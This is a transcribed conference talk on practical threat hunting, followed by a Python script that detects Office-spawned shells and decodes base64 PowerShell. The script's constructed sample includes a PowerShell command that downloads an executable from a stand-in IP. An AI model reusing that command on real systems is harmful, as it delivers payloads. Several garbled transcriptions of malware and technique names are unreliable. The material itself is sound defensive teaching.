
Thank you, thank you. I'm going to try going over the first ten slides real quick because of the time constraints, but to give a short overview: I really liked Jason's talk, which was the passive and active Deanna active attacks. I was kind of worried how much I can explain in the 45 minutes that I got today, but that talk really paved the path, I would say, so try to keep that talk in mind while I go through my slides over here. I'm going to fly through the first ten slides really quick because they're pretty much the 101 of why I am doing this talk.

So, to get started: my "Who am I", threat hunting basics, a recipe for what's needed to do a proper threat hunt, the attack lifecycle, and why we really like the MITRE ATT&CK framework. For people who do not know what the MITRE ATT&CK framework is, dive in and start looking into it; it's a really good platform to give you a start on what vectors you need and how you can attack those vectors, if you are looking for those. After that there is a small attack scenario that I made in such a way that I can talk to people who are getting into security, and it's also kind of an easy walkthrough for people who have been in the security industry and are doing what we try to preach is the right way of doing it. There is no really right way; it's just trying to see whose probability is better to detect that something is happening.

Currently I work for individual proms; I'm out of the Toronto office, and I actually manage their security platform of threat detection and response. I had good luck getting started in my career: I was working with in bridge, moved with Splunk, all the structure on the security, because that's something I just got stuck on. I don't really know how and why, but that's something I just love doing. Apart from that, as far as hobbies go, I love doing photography and drones, and I play a little bit of guitar and piano. Sometimes I leverage my drone to do recon activity as well, so
you guys get my drift. So before I get started I just wanted to get in and say: what do we actually understand by threat hunting? The reason I named my presentation not just "threat hunting" and added that extra word, "practical", is that at a lot of the talks I have been to or attended, I've seen people giving talks about threat hunting and what needs to be done, and usually they turn out to be something of a strategy. A lot of the times we miss out on why we are talking about hunting: what's the benefit of using this, can I start doing this as of today in my house, and then can I do it for, let's say, a packet size or an environment that's about three terabytes a day? All right, and the answer is yes, it's possible; you can do it for more than three terabytes a day, just by using open source tools, and if you are a good programmer you can just run the whole show yourself.

So, as the definition goes: proactively and iteratively looking or searching through the environment to detect and isolate threats that evade the existing security solutions. I really like this definition. I'm not going to go into who actually first told the definition and stuff like that, but what this actually shows is that we have been using AVs or some kind of protection mechanism, or solutions or products or appliances, in our company or our house or friends', please name it, but you still get attacked, you still get breached, you still get into trouble, or you still don't have an entire eyesight of what's going on in your network. So it's not that the traditional SOC is not doing their job correctly; what I feel like is there is a missing gap, and that's where threat hunting or threat hunters come in, to try to bridge the gap. The problem with the SOC, or the problem that I personally feel with the traditional SOC, is that it's always proactive; it's not really proactive as far as threat hunting goes, but it's proactive in nature. It's always driven by a product or a vendor or what's being taught to you; it's not what's needed or what needs to be done. So that's why I kind of lined that out: it's basically signature-based most of the time and it's alert driven. So what ends up happening is the actual SOC analysts' job becomes a rather reactive job instead of being proactive.

The concept and the mindset kind of change when you start thinking about threat hunting. That's because as a threat hunter, I think the first thing that we preach is you need to understand that there's always going to be a hacker, there's always going to be a breach, there's always going to be some kind of thing that you did not think of. The hacker just needs enough motivation, and probably money and other reasons, but it's always possible, it's always going to happen. Your part is how you can contain that after it has happened. So as a threat hunter your job is to find things that stand out, stick out, and are not normal. Thus, bringing on: it's a team effort. That's why I kind of have this slide over here. It's a team effort, where you need people who come from different mindsets, different experience, and have walked different paths in the library. When I talk about red teams over here, these are not, but
I'm not talking about pen testers; I'm talking about actual people who know how to infiltrate, who do a proper infrastructure or OT red team engagement. It's not a scanner. I'm not looking for scanners or people who can just run a button and say "yeah, I did a pen test, this is the vulnerability". That's not what I'm talking about. People who know and can strategize how you can infiltrate a company, how you can get to your objective with the least amount of noise possible; if the company is really well protected, how can you go against the CISOs and DPS and find enough details to go in from some other areas? So the strategy mentality is very important.

Apart from that, DFIR, digital forensics and incident response: this skill is very much needed when you are analyzing host-based data or network-based data. As I come on to the next few slides you will see why they become more important. The blue team over here which I talked about is also not the regular SOC that I have seen or we have come across, which is "there is an alert that triggered, oh, take a look as to what's going on", right? The blue team that I talk about here is people who have the capability and experience to look through data and can figure out that this is not normal. When I talk about "not normal", I'll come back to that later on. The normal for every client that you have or every company you work for will change based on what kind of mechanisms they are using, what kind of procedures they're using, what kind of tolerance they're using and what kind of appliances they're using in the network. A very basic example can be: is your company blocking ads? I'll come back to that topic later in the slides.

Again, threat intel is very important and plays a really crucial part in the entire engagement, because if you don't know what to look for, you're not looking for anything. Thus it can be a threat hunting team, or, what I like to say is, everyone in this room at some point needs to understand all these fields really well, and then you become a threat hunter. We are really looking for people who can do threat hunting all by themselves and do the entire team's job. It's not easy, but it's doable.

So before I go into more scenarios: what do we understand, and how do we leverage the threat hunters? Like, yeah, now we have hired a bunch of threat hunters, they're really good, but if you are not collecting the right logs, you are not looking for the right things, that entire process is just as good as, you know, pouring it down the drain. So the logs that you really want to look at are Bro, Snort,
Moloch, proxy logs. Just kind of curious how many people here can share the data on that: is your company doing web proxy? Just raise your hands if you are allowed to; if not, that's fine. But to intercept HTTP traffic, web proxy logs are really important, right? These logs play a very vital role as to what's needed. We were talking about phishing, right? Phishing: if you are not taking care of, or you're not ingesting, your mail server logs, you don't really know what you're looking at. Yeah, you can probably plug in a device and that's going to work based on signatures if something already happened, but usually with bigger clients, if the attacker is really motivated, they're not going to use anything that already has a known signature. They're going to either use something that's polymorphed, or that's not out in the market, or it's not out for script kiddies, as I call it.

For host data there is tons of data. A lot of work has been happening in Windows event logs, Sysmon and all of the new Sysmon; I don't know how many here have been playing with the new ones, it's just amazing, right? No one? Okay, but start looking into Sysmon. It's really amazing. It literally works with the MITRE framework; you can literally categorize where, what's happening and how it happened. Google Rapid Response, another great tool to monitor your hosts. For Linux-based, right, what do you do with Linux? Well, there is no security. I haven't mentioned that name over here, but there's no security, as well as OSSEC and auditd. Turn those on; you have enough data to look into your Linux boxes. A lot of the times host-based detection gets real tough when it's talking about SCADA networks, because of all the horror stories; probably a lot of people know, you turn on Sysmon, you might get a blue screen, you turn on something else, you might get something else, it doesn't work, the CPU utilization just increases and people don't like it, right? That's where Bro comes in. Bro, please look it up. I would really encourage people to start looking into Bro. It's a framework dedicated to doing network analysis; it's an analytic platform. Once you understand Bro data, I think you are already halfway to becoming a threat hunter. It literally has parsers to do a lot of protocol parsing and actually look into what needs to be looked at. And when you talk about having complete monitoring of your environment: Bro, Moloch, Snort, Suricata are your best friends.

Moving on to the next slide over here, the actual skills that I like to leverage out of my team. First, people who have worked with host data and maybe worked incident response; the knowledge that they bring to the table is how do I detect there is a persistence mechanism going on, code has been executed on a box, or privilege escalation is happening, or some kind of an exploit, right? As far as network analysis goes: lateral movement, C2 command and control, beacon pattern analysis, and payload deliveries and different stages of payloads. Nowadays newer malware tends to like to use not just one payload mechanism; usually there are two or three and they change. I'll talk about the beacon pattern in one of my slides just to give you guys a cool picture, as well as to show what you can achieve when you are looking at flow data, the same as the talk "passive and active monitoring", great talk by the way
by Jason. So I'll show you how to do beacon pattern analysis and how it helps you in your day-to-day job.

Threat intelligence: STIX and TAXII. These are the two names that will pop up every time we talk about threat intelligence or threat gathering. STIX gives the structure as to what your data needs to look like; TAXII is the way you transfer, peer-to-peer, that data that you are now generating. A lot of the data... there is a project called stats, look it up; it's an open source project, you can have it running in your home lab environment just to see how the data actually looks and how it can be leveraged.

Active defense and OSINT, I'm going to mix them together for different reasons. But active defense: a really good way of doing that is having honeypots that sit in your environment in strategic locations which only your security team is supposed to have access to. Anyone else having access to that box, a trigger pops up, because they're not supposed to know about this, they're not supposed to interact with this box; something's happening means you need to look into it. I would advise people looking into honeypots, and something that needs to be aware of with this crowd is, a lot of the honeypots are out there online and they're like one-click deployment. Look into Imogen servers, really good tools for learning, but not a great tool for actually doing something in your environment, because if I was a hacker I have the same resources; I can now fingerprint all these open-source honeypots and it's only going to take me a second before knowing it's a honeypot, and I'm not going to touch it. So it's actually of no use; try custom making your own honeypots.

OSINT: OSINT covers a huge field. Some good examples I can craft right now: if you are working for a company, or you monitor a whole lot of companies and you are responsible for threat intel. When I talk about threat intel I'm talking about tactical threat intel, not the general threat intel. So when it comes to tactical threat intelligence, what really matters is how much you are exposed to the public; by public I mean people who really want to attack you. So OSINT covers that phase. Now you have Shodan, you have Censys.io, and you have a whole whack of darknet tools that you can use. But at the end of the day what you guys need to understand is yes, they are there, you need to harness this knowledge. So thus comes coding, scripting, scraping, pasting data, scraping dumpster data, using Censys and Shodan to know: whoa, this IP or this port was not open for my company two days back, now it's open, what's going on, needs to be investigated, right? And you get an alert, literally, because it's not manual; it's not possible. Automation comes in after the people know what to look for.

OSINT also covers a lot of other fields that I like to talk about, especially from a threat intelligence background. A lot of the times companies call and say, you know, we want to get threat intelligence work done, but you can actually do this yourself very easily with your SOC team; you don't need too many people, one person can do this job. And it's a question: how many people in this hall actually scrape dumpster dives and know that their passwords have been pwned from different sources? Very few, I would think, but it is possible. You can always automate and script, for every time there's a username/password breach, let's say LinkedIn, let's say Adobe, those go to a dumpster. Hackers love spreading data around or sharing the information around in their own circle; it turns out to be either some form of a pastebin, an encoded form, or a dumpster guy, or some of the forums, or in the dark web. Scrape these things and now you have a database of all this information. Store them wherever you want; figure out what you need, how much resource you need, and start from just using MongoDB, right, like that's probably the 101 on storing data and looking into it. And once you feel, okay, now I need to do this on a really high
performance, and time is very crucial, you move on to Apache Spark, you move on to a Hadoop cluster, you move on to the ELK stack, you move on to Splunk. Choose your poison, but these are very important.

Okay, yeah, so I want to talk about the attack lifecycle. This is a mix-and-match from a lot of good attack lifecycles that have already been talked about by Lockheed Martin and different other companies, but what I want to show here is the attack framework, and, if you are a threat hunter, how your lifecycle needs to align with the red teamers'. So let's say the attack starts from recon, usually passive, active, and then it becomes a delivery mechanism, exploit, installation, C2, privilege escalation, lateral movement (that's already not a good sign in your environment if you're seeing that), objective, whatever the objective is. As a threat hunting guy, or from a background of threat hunting, your priority is, or, as I like to say it, we start the morning off by saying there is already a breach; let's find out if we can catch the breach and close it as soon as it's possible, right? So we come from a mindset that we do not think that, oh, everything's all awesome, it's sunny all the time. We come from a mindset where we think there is already a breach; let's contain that.

So from a defensive perspective your starting ground is similar to the same red teamer who's doing the work. Your work is to scrape all the data possibly visible somewhere in the world; if it's available to the hackers, it better be available to you and your company, right? And then take actions against those, and these are all priority one. These are literally... I like to skip all the cool stuff that companies make, like the SLAs and working with different teams and this and that. When you see an issue, pick up the phone, know your guy whom to call, get the work done. That's priority. Second is analysis: you analyze, and, back to the whole priority and SLA thing, right, you analyze if this is priority one, two, three; it can take up to a month, it can take up to a week to get this sorted out, but that's your decision or your team's decision to make this judgment call and get it fixed. If they don't work on it, demonstrate what a red teamer will do; that's why you need red teamers on your team, repeat, not pen testers. Triage the problem, investigate and contain. Your main interest is to contain when there is a breach happening. You know there's a breach happening; can I contain that, or can I already put a sandbox around it so that now I can monitor what the red team was trying to do, but he doesn't know that that's going on? There are different approaches of what you can do at this point.

Back to this last circle over here, as I mentioned: know your clients, know your terrain, as I like to say. Cybersecurity is the new form of warfare; people don't have time to press buttons here and there for actual military stuff. This will be the new warfare, if it hasn't been yet. But if it's government-sponsored, if it's an APT, you better know your client, because they're going to look for information that's available. Job postings give out a lot of software information and
metadata. Every time you have a post that's out in the market, I can now grab the computer name, your name, what your domain was and all this information very easily; I don't even have to waste more than two minutes on this. After that, you create your theories. Now these are my hypotheses: this is the way the attack is going to happen. Now that you have also investigated with the darknet recon work and OSINT activities, your hypothesis has now been crafted. Now you start looking for what is available in your network: is any of the hypotheses that you figured might be happening actually happening? If it's not, keep digging, right, until you have an answer that, yeah, you are foolproof protected. Keep digging. And obviously this is a very tedious job; don't do the same thing every day. Use and leverage products that are out in the market. Every time a hypothesis becomes... it needs to be enriched with the data and the threat intelligence platform you're leveraging, so that the next time it's actually automated. You know, you're not running the same searches every day by yourself; it just doesn't work. So that part is something a lot of the companies, I personally feel, fail at. The last part is: now you have good people with experience; you probably are being bottlenecked with the product. Product comes second, people come first. Have experienced people, train the people that you have, ask them what they need to get the work done, right, then figure out what product you need to use.

I don't know why it's clicking twice, but know that for the longest time I was talking about what things we need, what logs we need and what gives the threat hunter, well, basically what makes a threat hunter get his job done. Now I'm showing when a threat hunter gets his job done there are some cool screens like this that pop up, and it's pretty neat when you get the job done, because no one's going to give you a pat on the back, but when you go back home you will be like, yeah, I did something good today, right?

So something here that I want to talk about is beacon pattern analysis. For this you definitely need Bro logs and something else, like there are streams or Splunk Stream; Wong has written that, but you need something that looks into flow data. So right now we are looking at HTTP events or HTTP flow. If you don't have web proxies in your company, or it's not deployed properly, you can also leverage different technologies and fingerprinting mechanisms like JA3 for HTTP. You can also come up with your own fingerprint mechanism that you have tried in your own lab, and you know when someone is running a reverse shell,
Meterpreter over HTTPS, if someone's doing an IRC outbound; these are all possible to fingerprint, and your data will look like this. So in this case, one morning we just started off the work again, we look at the screen, and this is one of our times that actually happened in the month of April, a month of August actually, and we were looking at this. The blue line, the one you guys see, is the last 24 hours; the red line is actually the last day, how it looked; and the green line was how it looked on a cluster, made by an AI that we run behind, how it usually looks, right? With this pattern right here we were like, well, this is not normal to us, because we've been monitoring the network for a long time; this pattern of the blue line over here does not look right. Instantly we got triggered, obviously, and even without someone looking into the dashboard we would get triggered on an alert that, okay, something's not right going on with HTTP flow, look into it. This was actually related to the Conficker worm. Basically, if you guys don't know what that is, I would suggest looking into F-Secure; they did a really nice blog about it. It shows how Conficker works and how it makes its way into the environment, and why it needs to generate that pattern, and this screen I'm showing is about how that pattern actually got generated.

So right here you're seeing a DGA, which is a domain generation algorithm, and not only Conficker actually uses this technology, or this method; it's being used by a lot of ransomware out in the market, and this is a way they talk back to their C2. So our next step, from that previous screen, was: okay, since we have the data, what kind of DNS queries were being made and what kind of HTTP requests were being made? Let's try to look into that. And we came across this. At first we were like, wow, okay, it looks completely random, but if you look close enough, and you have all your information, it comes back to threat intelligence. At this time, if you even just copy-pasted one of these domains and went to any of your intelligence platforms (I'm not going to name the platforms), you go there, plug it in, it's not going to give you any reference; it wouldn't tell what it was, because this was very new at that time. But since we were scraping pastebin, and we have our own honeypots deployed across all the continents we can think of, over 6,000 of them, and we capture all that data into our threat intelligence platform, from these two sources, mainly pastebin, because there was a really nice piece of research done by one of the Chinese intelligence people and he decided to place that on pastebin, thank God, we basically started looking up with these DNS queries, and we basically could trace it back that, okay, this was an infection, this is Conficker. Next thing is, you know, phone up the guy who goes with this section, call him to pull the plug. If they want to run any kind of dissection or any kind of forensics on this box, tell them not to restart the box, because that ends up happening a lot of the time and you actually lose valuable information. A lot of these worms tend to be not on the disk; they tend to be in memory. So if you restart the box,
it means you're losing what was actually happening.

Also, a lot of the times, as threat hunters we really need tools to guide us over the day or to make our life easier, or else the work will just eat up every individual's time and we won't be able to monitor multiple clients over the day, right? Some of the tricks that we use is basically this one over here: we use DNS entropy and HTTP entropy. What they are, basically, another way of seeing it, is we leverage Shannon entropy to actually come up with, okay, this one does not look like a valid hostname or a valid query; it just does not seem right. And there are always a lot of false positives depending on what kind of environment you are in; a lot of these HTTP requests, like the one that's being shown here, is actually a Google ad. So we tend to monitor ads, because a lot of the time, if I was a hacker, you already have a network, which is the ad network, that's infiltrating anyways; I'm just going to make a fork off that same network and try to infiltrate your company, because you are not blocking ads. So we tend to monitor what's going on with the ad network as well, and the recent spike would be Chrome extensions and other browser extensions; those are also very easily detectable with this technology right here, or this way of looking into data. I wouldn't call it a technology, but it's a way of visualizing the data.

The second part, if you guys can see, I don't know if you guys can see it well enough, but the HTTP entropy, the second part right here, you see whole gibberish, right? If you look into this kind of data over and over again... I can't really share from where I got this data, but it ended up being a vending machine that was in a schedule, and that shouldn't have been; that's all I can give. When you are looking at this data stream, if you have been looking into this kind of data over and over again, at this stage you will know that this is byte stream data being transferred outbound from wherever the location is; it definitely needs to be looked at as to what's the C2, what's happening, how did it get in. For this case I can share that, yeah, this was a vending machine doing this, which was not supposed to do this.

After that, this is the walkthrough that I was talking about, and I'm going to try to cover this area as quickly as possible. Going through, no harm done time-wise, but I think I can manage. So the walkthrough is actually a simple one that I got, so that people who are starting out in the industry can understand this walkthrough very well: a simple case of phishing and detecting it, and before the guy who's doing the phishing reaches his objective, how you can trap it, contain it and resolve it so that it does not become a problem, right? For that, what are the pivot points you need to know? You need to see the data that shows process executions, PowerShell logging and email logs. So as far as host data is concerned, for this particular case the only thing you need to leverage is actually Sysmon data, Windows event logs, mail logs and some sort of network stream data. So again, back to Bro or some kind
of a stream. So based on this, this was actually a case of Emotet. For people who do not know what Emotet is, I would strongly suggest, again, research. The only way this field is going to make your life easier and make it better is the more research you do; without the hard work nothing comes for free, that's what I usually tell people.

For the hunt hypothesis: searching for programs launching VB, PowerShell or command-line arguments. That's my first hypothesis. So I need to start looking for: did anything happen on that box that had been running a VB script, a command line or a PowerShell execution? Did that happen on that box? Are we seeing any kind of C2 that's going out of that box somewhere? Right, at that point that's my hypothesis. And setting up persistence. For persistence, as days go by hackers are coming up with different ways, but I'm going to go over that slide and show you guys what the key methods are that a lot of the red teamers tend to use and what has been in use for a while, but now they're changing their tactics. Also for this particular case we had an unknown file hash. So basically what I'm trying to say here is, let's say you do get a hash; probably none of the vendors will know. Also, at the same time, if your favorite link becomes VirusTotal or something very similar, you go plug in the hash, you have no information on what you're looking at.

Okay, now this material, I doubt how many eyes can see from the back what's written all over the screen, but my plan is that when you guys take back this presentation you get a chance to look over this entire process. This is a walkthrough of what I'm entirely trying to explain right now with you guys; it's in this diagram, it's given with all the details. To make it really quick and easy: on that side, we found that this is Emotet based on pastebin data, and we also actually confirmed that the ye health that we see here is actually the delivery mechanism that the new Emotet was using. Apart from that we also found the execution tree, which basically was a Word macro; it leveraged command line with obfuscation, and after that it moved on to actually doing the next stage of the payload, which was leveraging a PowerShell script that was base64 encoded PowerShell. I'm going to come to that slide next. But also we were able to get all the C2s that it was communicating outbound with, and also the SHA-256, for helping out and sharing the data with other threat intel people who are getting our threat intelligence feeds. Also, since we also deploy Snort or Suricata in our environment, we obviously get any kind of IDS matches that happen. So for this particular case we did get auto open macro and terse named file that's possibly hostile. But the kill chain of how it happened was: there was an email that was sent; even though they were using a really good vendor known to block a lot of these, it did not block it. Next thing we know, the user does click on the macro and that fancy picture I showed in the last screen. From there it actually leveraged Explorer; from there it went to winword.exe, that launched cmd, used cmd to call PowerShell, and PowerShell actually downloaded the second stage of the payload, that was seven to nine exe. The seven to nine exe actually copies itself in multiple places and it then changed its name to T voluntarily exe, and T voluntary dot exe is responsible for doing all the other stages that come across, which is the persistence mechanism. In this case this is Emotet; if this was an NG rat, the T vondre would be leveraging that and lateral movement in the network. But the way we got to know... I'm going to come back to this slide after I'm done with this slide. Where is my slide that I want to show? Okay, so here is a small breakdown of what the PowerShell looked like, and the reason I give this out to
you guys is, when you guys take it back home, it's pretty easy dissecting a base64 encoded PowerShell once you have it. And we also saw that the seven to nine exe and the T voluntary exe shared the same hash; that's confirming it was the same exe that just copied itself into a different folder or different folders. For this particular case, the PowerShell, after we decoded it, we saw all the actual communicating servers that it was leveraging, and at this point, you know, you just pick up the phone, call the right people, get those blocked. And also, since you are now monitoring a lot of different clients or the entire company, what you might want to do is plug these into your search query and see if there's any other box that might have been infected somewhere else, because people like to bring in the box and take out the box, right? Laptops, phones, whatever: did they get infected somewhere else and then come into the office? If they did, and they are actually online right now and they're talking, we have another detection; work on it, get it fixed.

So now I'll go back to my previous screen. Okay, so with the network-based data, what monitoring can you leverage with network-based data, right? So we saw that a download actually happened from that destination IP right here; I'm not going to read that out, but you guys probably can see it. At this point sometimes what we like to do is go after that adversary, so we would probably start doing a red teaming engagement against these people who are doing this, just for fun. Also at this point you can see the Mozilla extension that's being used, so the Mozilla 4.0 is an older user agent version; it's not the latest one. And also we get other details: this is a msword, status code is, well, obviously, 200. And also that alert that we detected with Sysmon data, even before we did a deep dive, just looking at the Sysmon events, what happens. And you can look at these events in various different forms, but what we tend to do is just see what's going on in that hour in our network, based on segments of different IP sections and subnets. So when we did that scan we saw that, okay, there is a file created and a registry value set; oh, that's not a good sign. That brings us onto the next stream. So we started doing a deeper dive; we see that, okay, there was a command line that was obfuscated, not encoded, it was just obfuscated. The reason hackers tend to use obfuscation over encoding is because it's polymorphic in nature: you can always keep on changing the same code over and over again with polymorphic obfuscation and you can reuse the same code over and over again. Thus the command line which we saw: okay, this is the command line; what called the command line was the parent image right here at the bottom, if you see that. Okay, it leveraged winword.exe, and the command line was called, and obviously the image that was called is the command line. After that we see that, okay, the command line, after it ran, it actually called PowerShell, which was encoded and which did the rest of the work. I already went over this screen with you guys.

So as far as disk activities are considered, also through Sysmon you can gather what actually happened on that box. So we actually did see that, okay, yep, the 79 exe was created and after that creation the T voluntary was created, and so forth. Those are for, let's say, you need to submit a report to someone as to what exactly happened; these become very useful evidence that you need to submit. Apart from that, again back to the network, when the C2 was actually happening, you still see that, okay, it was reaching out to a destination IP; I kind of highlighted that, and the process that was using it is the PowerShell. Back to persistence, the thing I wanted to talk to you about. Persistence: what you guys need to look out for is
usually hackers will tend to use or leverage Ron keys which is basically setting up registry values or registry keys services scheduled tasks off line office templates dll's access features beacon patterns and out IDs and lateral movement now these are all that is trackable once you have a very good visibility of your network and these are usually what the advisories will be trying to use and the first three I call them the old-school ways hackers love to use those the more and more new members are coming out of worms are coming out they don't tend to even exist on the disk it's probably on the memory so beacon pattern becomes very important they love to do an API injection thus
infiltrating our dll without even being part of the disk that's so you can track those changes and obviously lateral movement you will see a box trying to communicate with multiple boxes running so brings onto the well this page actually talks about the registry that I was talking about the wrong keys so we actually see that T voluntary did registry implementation over here for its persistence mechanism next slide I talked about lateral movement don't know why I can't go to the next slide
technical difficulties guys but yeah lateral movements for lateral movement the things that you can leverage your in your monitoring is is there a recon work happening is there a port scanning happening is there a power show exact that's running off that box where it's not supposed to run is there an RDP session going on or is there actually a PS remoting happening right after that there will be probably I tend to do a zone transfer or DNS poisoning attempts or they can leverage something called the bloodhound and with a really awesome plugin that was recently bought a few years back that was done there was a add-on that happened that's called the angry puppy it literally does LDAP enumeration
giving out most of your details about the interactive directory right so those are the signs that you can look for but make sure you contain the data before this step happens this is already too late but still need to know when this thing happens what to look for what you also expect to see is through system owned or Windows data that anonymous user activities service logins LDAP traffic high count of one to many connections one box trying to do RDP sessions with multiple other different box or trying to scan different other boxes from that same box which will become which actually is a pivot case that all of the time we actually alert on and start looking into that why is
this box from the HR department trying to get into a box that belongs to the monitoring department or some other department but when you know what your baseline is these kind of detections can be tracked and monitored very easily but again back to what data types am I gonna leverage off that that is going to allow my threat hunters to do this job system on data windows data bro log I think that is pretty much that brings us to the end of the presentation the reason I did this presentation was I believed in the cause that people needs to learn understand what this is rather learning our product works people need to understand how and why someone's doing something the
question is not that why are they doing it to us the question is I can do it so I'll do it that's usually the argument for a hacker who's trying to do something bad to your organization or you or your parents right just pick whatever is the different scenarios but the thing usually happens very similar fashion so we have a huge and I repeat we have a huge deficiency of people who knows how to look into this kind of information and do the work right when I actually go into public or are going to a workshop I actually see a lot of young people and they're all very you know they're they're I was young at like only just
few months or a few years back and basically they all loved to get into the field but they don't really know what to look for how to get started what can we leverage how much can be learned just by doing stuff in your own home lab environment it doesn't take much it doesn't even take a big server to run a lot of the stuff to just start running actually bro made Raspberry Pi port Splunk made a portable portable version for running in Raspberry Pi so you can run this entire scenario for your home in a Raspberry Pi and monitor your home and learn at the same time while I was monitoring my home a good
scenario was I actually I buy stuff so that I can break them so I bought out a whole pack of Samsung lo ble devices and basically their home oh my arts that's what I like to call them but they serve different purposes like their toasters or their music players or their speakers and Smart TVs you'll be surprised how much data goes to south well goes to South Korea from your house when you run all these now ten god it's not the other end of the Koreas but it's South Korea for that case but a lot of cool and interesting things that you can find from just looking into your home network and you can leverage the Raspberry Pi
cause your home is probably about only 10 or 20 or 30 or 50 devices strong obviously you can do the same for environment so there needs to be a way you can so the question comes what you need to look for what you want to accomplish and what agents and what appliances can do this job for you guys just to give a brief history of this conversation few years back I was talking to some people and they told me or what you're saying is is possible in a lab environment it's never possible in an actual corporate environment let me tell you that statement was completely wrong we currently do 10 terabytes of data a day and we run this entire show
24/7 all around the year right so this is possible you just need to figure out what you need what infrastructure you can leverage of what tools you need what what crap you can throw off there's all this crap with any kind of oil that comes in you need to know what you can Creek in and out and only use it for the purpose it was bought for but also for people who are starting out in the industry filled in this security industry I think the three really good platforms that you can learn from a lot is security onions salt and hunting elk hunting with elk are called health there is a great DEFCON presentation for help I would strongly
recommend practice this in your lab environments create your own environments and start doing these to understand security better the more you guys understand the easier it becomes for the security fuel to work and yeah let's work together and let's get the show running so that's all for my presentation and hopefully you guys had something to take back home today you
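The two hunting steps the talk walks through, spotting a shell whose parent chain leads back to winword.exe in Sysmon process-creation data and then decoding the base64 PowerShell to pull out the servers it talks to, as an added Python example that is not part of the speaker's slides or tooling. Host names, pids, paths and the URL in the sample events are constructed, and the Sysmon fields are reduced to a minimal dict per event.

```python
import base64
import re
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

def ps_encode(script):
    """Base64 of UTF-16LE text: the form powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def ps_decode(cmdline):
    """Decode the -EncodedCommand argument (also -e, -ec, -enc spellings); None if absent/invalid."""
    m = re.search(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def indicators(text):
    """URLs and bare IPv4 addresses in a decoded script: what you block and then pivot on."""
    return sorted(set(re.findall(r"https?://[^\s'\"()]+", text)) | set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text)))

def chain(events, pid):
    """Image basenames from pid up to the root, following the ParentProcessId of Sysmon ID 1."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid and len(names) < 16:  # bound the walk in case of pid-reuse loops
        names.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return names

def hunt(events):
    """Shells with an Office ancestor, plus the decoded PowerShell's C2 indicators if any."""
    findings = []
    for e in events:
        c = chain(events, e["pid"])
        if c[0] in SHELLS and OFFICE & set(c[1:]):
            decoded = ps_decode(e["cmd"]) or ""
            findings.append({"host": e["host"], "chain": c, "indicators": indicators(decoded)})
    return findings

# Constructed sample modelled on the chain in the talk; host names, pids, paths and URL are made up.
STAGE2 = "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/s2.exe','C:\\Users\\Public\\s2.exe')"
EVENTS = [
    {"host": "ws-17", "pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"host": "ws-17", "pid": 4100, "ppid": 4000, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmd": "WINWORD.EXE invoice.doc"},
    {"host": "ws-17", "pid": 4200, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c powershell -nop -w hidden -enc " + ps_encode(STAGE2)},
    {"host": "ws-17", "pid": 4300, "ppid": 4200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell -nop -w hidden -enc " + ps_encode(STAGE2)},
    {"host": "ws-22", "pid": 950, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell -enc " + ps_encode("Get-Process")},
]
```

The ws-22 event is a PowerShell run with no Office ancestor and is left alone, while both the cmd.exe and powershell.exe events on ws-17 are reported with the decoded download host, which is what you would feed back into your search across the rest of the fleet.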